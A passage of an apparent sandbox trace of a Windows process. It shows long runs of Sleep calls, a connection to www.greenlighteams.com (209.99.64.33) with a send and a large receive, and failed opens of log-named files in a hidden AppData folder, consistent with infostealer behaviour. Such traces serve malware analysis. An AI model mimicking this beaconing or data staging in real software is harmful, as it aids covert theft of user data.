(dwMilliseconds=0x7d0) [0192.771] Sleep (dwMilliseconds=0x7d0) [0192.773] Sleep (dwMilliseconds=0x7d0) [0192.774] Sleep (dwMilliseconds=0x7d0) [0192.776] Sleep (dwMilliseconds=0x7d0) [0192.777] Sleep (dwMilliseconds=0x7d0) [0192.779] Sleep (dwMilliseconds=0x7d0) [0192.780] Sleep (dwMilliseconds=0x7d0) [0192.782] Sleep (dwMilliseconds=0x7d0) [0192.783] Sleep (dwMilliseconds=0x7d0) [0192.785] Sleep (dwMilliseconds=0x7d0) [0192.787] Sleep (dwMilliseconds=0x7d0) [0192.789] Sleep (dwMilliseconds=0x7d0) [0192.790] Sleep (dwMilliseconds=0x7d0) [0192.792] Sleep (dwMilliseconds=0x7d0) [0192.793] Sleep (dwMilliseconds=0x7d0) [0192.795] Sleep (dwMilliseconds=0x7d0) [0192.796] Sleep (dwMilliseconds=0x7d0) [0192.798] Sleep (dwMilliseconds=0x7d0) [0192.799] Sleep (dwMilliseconds=0x7d0) [0192.801] Sleep (dwMilliseconds=0x7d0) [0192.802] Sleep (dwMilliseconds=0x7d0) [0192.804] Sleep (dwMilliseconds=0x7d0) [0192.806] Sleep (dwMilliseconds=0x7d0) [0192.816] Sleep (dwMilliseconds=0x7d0) [0192.817] Sleep (dwMilliseconds=0x7d0) [0192.819] Sleep (dwMilliseconds=0x7d0) [0192.820] Sleep (dwMilliseconds=0x7d0) [0192.822] Sleep (dwMilliseconds=0x7d0) [0192.827] Sleep (dwMilliseconds=0x7d0) [0192.828] Sleep (dwMilliseconds=0x7d0) [0192.829] Sleep (dwMilliseconds=0x7d0) [0192.831] Sleep (dwMilliseconds=0x7d0) [0192.832] Sleep (dwMilliseconds=0x7d0) [0192.834] Sleep (dwMilliseconds=0x7d0) [0192.835] Sleep (dwMilliseconds=0x7d0) [0192.837] Sleep (dwMilliseconds=0x7d0) [0192.838] Sleep (dwMilliseconds=0x7d0) [0192.840] Sleep (dwMilliseconds=0x7d0) [0192.842] Sleep (dwMilliseconds=0x7d0) [0192.843] Sleep (dwMilliseconds=0x7d0) [0192.844] Sleep (dwMilliseconds=0x7d0) [0192.846] Sleep (dwMilliseconds=0x7d0) [0192.847] Sleep (dwMilliseconds=0x7d0) [0192.849] Sleep (dwMilliseconds=0x7d0) [0192.850] Sleep (dwMilliseconds=0x7d0) [0192.852] Sleep (dwMilliseconds=0x7d0) [0192.854] Sleep (dwMilliseconds=0x7d0) [0192.856] Sleep (dwMilliseconds=0x7d0) [0192.857] Sleep (dwMilliseconds=0x7d0) [0192.861] Sleep (dwMilliseconds=0x7d0) [0192.862] Sleep (dwMilliseconds=0x7d0) [0192.863] Sleep (dwMilliseconds=0x7d0) [0192.865] Sleep (dwMilliseconds=0x7d0) [0192.866] Sleep (dwMilliseconds=0x7d0) [0192.868] Sleep (dwMilliseconds=0x7d0) [0192.869] Sleep (dwMilliseconds=0x7d0) [0192.871] Sleep (dwMilliseconds=0x7d0) [0192.872] Sleep (dwMilliseconds=0x7d0) [0192.874] Sleep (dwMilliseconds=0x7d0) [0192.875] Sleep (dwMilliseconds=0x7d0) [0192.877] Sleep (dwMilliseconds=0x7d0) [0192.879] Sleep (dwMilliseconds=0x7d0) [0192.880] Sleep (dwMilliseconds=0x7d0) [0192.882] Sleep (dwMilliseconds=0x7d0) [0192.883] Sleep (dwMilliseconds=0x7d0) [0192.885] Sleep (dwMilliseconds=0x7d0) [0192.886] Sleep (dwMilliseconds=0x7d0) [0192.888] Sleep (dwMilliseconds=0x7d0) [0192.889] Sleep (dwMilliseconds=0x7d0) [0192.891] Sleep (dwMilliseconds=0x7d0) [0192.892] Sleep (dwMilliseconds=0x7d0) [0192.894] Sleep (dwMilliseconds=0x7d0) [0192.896] Sleep (dwMilliseconds=0x7d0) [0192.897] Sleep (dwMilliseconds=0x7d0) [0192.900] Sleep (dwMilliseconds=0x7d0) [0192.901] Sleep (dwMilliseconds=0x7d0) [0192.902] Sleep (dwMilliseconds=0x7d0) [0192.904] Sleep (dwMilliseconds=0x7d0) [0192.906] Sleep (dwMilliseconds=0x7d0) [0192.907] Sleep (dwMilliseconds=0x7d0) [0192.908] Sleep (dwMilliseconds=0x7d0) [0192.910] Sleep (dwMilliseconds=0x7d0) [0192.911] Sleep (dwMilliseconds=0x7d0) [0192.913] Sleep (dwMilliseconds=0x7d0) [0192.914] Sleep (dwMilliseconds=0x7d0) [0192.917] Sleep (dwMilliseconds=0x7d0) [0192.918] Sleep (dwMilliseconds=0x7d0) [0192.919] Sleep (dwMilliseconds=0x7d0) [0192.921] Sleep (dwMilliseconds=0x7d0) [0192.922] Sleep (dwMilliseconds=0x7d0) [0192.924] Sleep (dwMilliseconds=0x7d0) [0192.925] Sleep (dwMilliseconds=0x7d0) [0192.927] Sleep (dwMilliseconds=0x7d0) [0192.930] Sleep (dwMilliseconds=0x7d0) [0192.931] Sleep (dwMilliseconds=0x7d0) [0192.933] Sleep (dwMilliseconds=0x7d0) [0192.934] Sleep (dwMilliseconds=0x7d0) [0192.936] Sleep (dwMilliseconds=0x7d0) [0192.937] Sleep (dwMilliseconds=0x7d0) [0192.939] Sleep (dwMilliseconds=0x7d0) [0192.940] Sleep (dwMilliseconds=0x7d0) [0192.942] Sleep (dwMilliseconds=0x7d0) [0192.944] Sleep (dwMilliseconds=0x7d0) [0192.945] Sleep (dwMilliseconds=0x7d0) [0192.947] Sleep (dwMilliseconds=0x7d0) [0192.948] Sleep (dwMilliseconds=0x7d0) [0192.950] Sleep (dwMilliseconds=0x7d0) [0192.951] Sleep (dwMilliseconds=0x7d0) [0192.953] Sleep (dwMilliseconds=0x7d0) [0192.955] Sleep (dwMilliseconds=0x7d0) [0192.957] Sleep (dwMilliseconds=0x7d0) [0192.959] Sleep (dwMilliseconds=0x7d0) [0192.961] Sleep (dwMilliseconds=0x7d0) [0192.962] Sleep (dwMilliseconds=0x7d0) [0192.964] Sleep (dwMilliseconds=0x7d0) [0192.965] Sleep (dwMilliseconds=0x7d0) [0192.967] Sleep (dwMilliseconds=0x7d0) [0192.971] Sleep (dwMilliseconds=0x7d0) [0192.972] Sleep (dwMilliseconds=0x7d0) [0192.974] Sleep (dwMilliseconds=0x7d0) [0192.975] Sleep (dwMilliseconds=0x7d0) [0192.977] Sleep (dwMilliseconds=0x7d0) [0192.978] Sleep (dwMilliseconds=0x7d0) [0192.980] Sleep (dwMilliseconds=0x7d0) [0192.982] Sleep (dwMilliseconds=0x7d0) [0192.983] Sleep (dwMilliseconds=0x7d0) [0192.985] Sleep (dwMilliseconds=0x7d0) [0192.986] Sleep (dwMilliseconds=0x7d0) [0192.988] Sleep (dwMilliseconds=0x7d0) [0192.989] Sleep (dwMilliseconds=0x7d0) [0192.991] Sleep (dwMilliseconds=0x7d0) [0192.992] Sleep (dwMilliseconds=0x7d0) [0192.994] Sleep (dwMilliseconds=0x7d0) [0192.995] Sleep (dwMilliseconds=0x7d0) [0192.997] Sleep (dwMilliseconds=0x7d0) [0192.998] Sleep (dwMilliseconds=0x7d0) [0193.000] Sleep (dwMilliseconds=0x7d0) [0193.001] Sleep (dwMilliseconds=0x7d0) [0193.003] Sleep (dwMilliseconds=0x7d0) [0193.004] Sleep (dwMilliseconds=0x7d0) [0193.006] Sleep (dwMilliseconds=0x7d0) [0193.007] Sleep (dwMilliseconds=0x7d0) [0193.009] Sleep (dwMilliseconds=0x7d0) [0193.010] Sleep (dwMilliseconds=0x7d0) [0193.012] Sleep (dwMilliseconds=0x7d0) [0193.014] Sleep (dwMilliseconds=0x7d0) [0193.015] Sleep (dwMilliseconds=0x7d0) [0193.017] Sleep (dwMilliseconds=0x7d0) [0193.018] Sleep (dwMilliseconds=0x7d0) [0193.020] Sleep (dwMilliseconds=0x7d0) [0193.021] Sleep (dwMilliseconds=0x7d0) [0193.023] Sleep (dwMilliseconds=0x7d0) [0193.025] Sleep (dwMilliseconds=0x7d0) [0193.027] Sleep (dwMilliseconds=0x7d0) [0193.028] Sleep (dwMilliseconds=0x7d0) [0193.030] Sleep (dwMilliseconds=0x7d0) [0193.031] Sleep (dwMilliseconds=0x7d0) [0193.033] Sleep (dwMilliseconds=0x7d0) [0193.035] Sleep (dwMilliseconds=0x7d0) [0193.037] Sleep (dwMilliseconds=0x7d0) [0193.042] Sleep (dwMilliseconds=0x7d0) [0193.043] Sleep (dwMilliseconds=0x7d0) [0193.045] Sleep (dwMilliseconds=0x7d0) [0193.046] Sleep (dwMilliseconds=0x7d0) [0193.048] Sleep (dwMilliseconds=0x7d0) [0193.049] Sleep (dwMilliseconds=0x7d0) [0193.051] Sleep (dwMilliseconds=0x7d0) [0193.052] Sleep (dwMilliseconds=0x7d0) [0193.055] Sleep (dwMilliseconds=0x7d0) [0193.056] Sleep (dwMilliseconds=0x7d0) [0193.058] Sleep (dwMilliseconds=0x7d0) [0193.059] Sleep (dwMilliseconds=0x7d0) [0193.061] Sleep (dwMilliseconds=0x7d0) [0193.062] Sleep (dwMilliseconds=0x7d0) [0193.064] Sleep (dwMilliseconds=0x7d0) [0193.065] Sleep (dwMilliseconds=0x7d0) [0193.067] Sleep (dwMilliseconds=0x7d0) [0193.069] Sleep (dwMilliseconds=0x7d0) [0193.070] Sleep (dwMilliseconds=0x7d0) [0193.072] Sleep (dwMilliseconds=0x7d0) [0193.073] Sleep (dwMilliseconds=0x7d0) [0193.075] Sleep (dwMilliseconds=0x7d0) [0193.076] Sleep (dwMilliseconds=0x7d0) [0193.078] Sleep (dwMilliseconds=0x7d0) [0193.079] Sleep (dwMilliseconds=0x7d0) [0193.081] Sleep (dwMilliseconds=0x7d0) [0193.082] Sleep (dwMilliseconds=0x7d0) [0193.084] Sleep (dwMilliseconds=0x7d0) [0193.085] Sleep (dwMilliseconds=0x7d0) [0193.087] Sleep (dwMilliseconds=0x7d0) [0193.088] Sleep (dwMilliseconds=0x7d0) [0193.091] socket (af=2, type=1, protocol=6) returned 0x1ec0 [0193.091] getaddrinfo (in: pNodeName="www.greenlighteams.com", pServiceName="80", pHints=0x9e75d38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e75d68 | out: ppResult=0x9e75d68*=0xa05e890*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f8e930*(sa_family=2, sin_port=0x50, sin_addr="209.99.64.33"), ai_next=0x0)) returned 0 [0193.352] connect (s=0x1ec0, name=0x9f8e930*(sa_family=2, sin_port=0x50, sin_addr="209.99.64.33"), namelen=16) returned 0 [0193.491] send (s=0x1ec0, buf=0x82e10fa*, len=172, flags=0) returned 172 [0193.492] setsockopt (s=0x1ec0, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0193.492] recv (in: s=0x1ec0, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 23064 [0193.881] closesocket (s=0x1ec0) returned 0 [0193.884] Sleep (dwMilliseconds=0x7d0) [0193.885] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.885] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.886] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0193.886] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a460) returned 1 [0193.886] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.886] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.886] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0193.886] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a460) returned 1 [0193.886] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.886] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.886] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0193.886] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89890) returned 1 [0193.886] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.886] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.886] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0193.886] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89890) returned 1 [0193.886] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.886] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.887] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0193.887] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a730) returned 1 [0193.887] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.887] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.887] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0193.887] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a730) returned 1 [0193.887] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.887] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.887] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0193.887] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a850) returned 1 [0193.887] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.887] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.887] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0193.887] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89c80) returned 1 [0193.887] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.888] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.888] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0193.888] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a460) returned 1 [0193.888] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.888] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.888] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0193.888] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89890) returned 1 [0193.888] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.888] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.888] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0193.888] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89f50) returned 1 [0193.888] Sleep (dwMilliseconds=0x7d0) [0193.890] Sleep (dwMilliseconds=0x7d0) [0193.891] Sleep (dwMilliseconds=0x7d0) [0193.893] Sleep (dwMilliseconds=0x7d0) [0193.895] Sleep (dwMilliseconds=0x7d0) [0193.897] Sleep (dwMilliseconds=0x7d0) [0193.899] Sleep (dwMilliseconds=0x7d0) [0193.900] Sleep (dwMilliseconds=0x7d0) [0193.902] Sleep (dwMilliseconds=0x7d0) [0193.903] Sleep (dwMilliseconds=0x7d0) [0193.905] Sleep (dwMilliseconds=0x7d0) [0193.907] Sleep (dwMilliseconds=0x7d0) [0193.908] Sleep (dwMilliseconds=0x7d0) [0193.910] Sleep (dwMilliseconds=0x7d0) [0193.911] Sleep (dwMilliseconds=0x7d0) [0193.913] Sleep (dwMilliseconds=0x7d0) [0193.914] Sleep (dwMilliseconds=0x7d0) [0193.916] Sleep (dwMilliseconds=0x7d0) [0193.918] Sleep (dwMilliseconds=0x7d0) [0193.919] Sleep (dwMilliseconds=0x7d0) [0193.921] Sleep (dwMilliseconds=0x7d0) [0193.922] Sleep (dwMilliseconds=0x7d0) [0193.924] Sleep (dwMilliseconds=0x7d0) [0193.925] Sleep (dwMilliseconds=0x7d0) [0193.927] Sleep (dwMilliseconds=0x7d0) [0193.928] Sleep (dwMilliseconds=0x7d0) [0193.930] Sleep (dwMilliseconds=0x7d0) [0193.931] Sleep (dwMilliseconds=0x7d0) [0193.933] Sleep (dwMilliseconds=0x7d0) [0193.935] Sleep (dwMilliseconds=0x7d0) [0193.936] Sleep (dwMilliseconds=0x7d0) [0193.938] Sleep (dwMilliseconds=0x7d0) [0193.939] Sleep (dwMilliseconds=0x7d0) [0193.941] Sleep (dwMilliseconds=0x7d0) [0193.942] Sleep (dwMilliseconds=0x7d0) [0193.944] Sleep (dwMilliseconds=0x7d0) [0193.945] Sleep (dwMilliseconds=0x7d0) [0193.947] Sleep (dwMilliseconds=0x7d0) [0193.948] Sleep (dwMilliseconds=0x7d0) [0193.950] Sleep (dwMilliseconds=0x7d0) [0193.951] Sleep 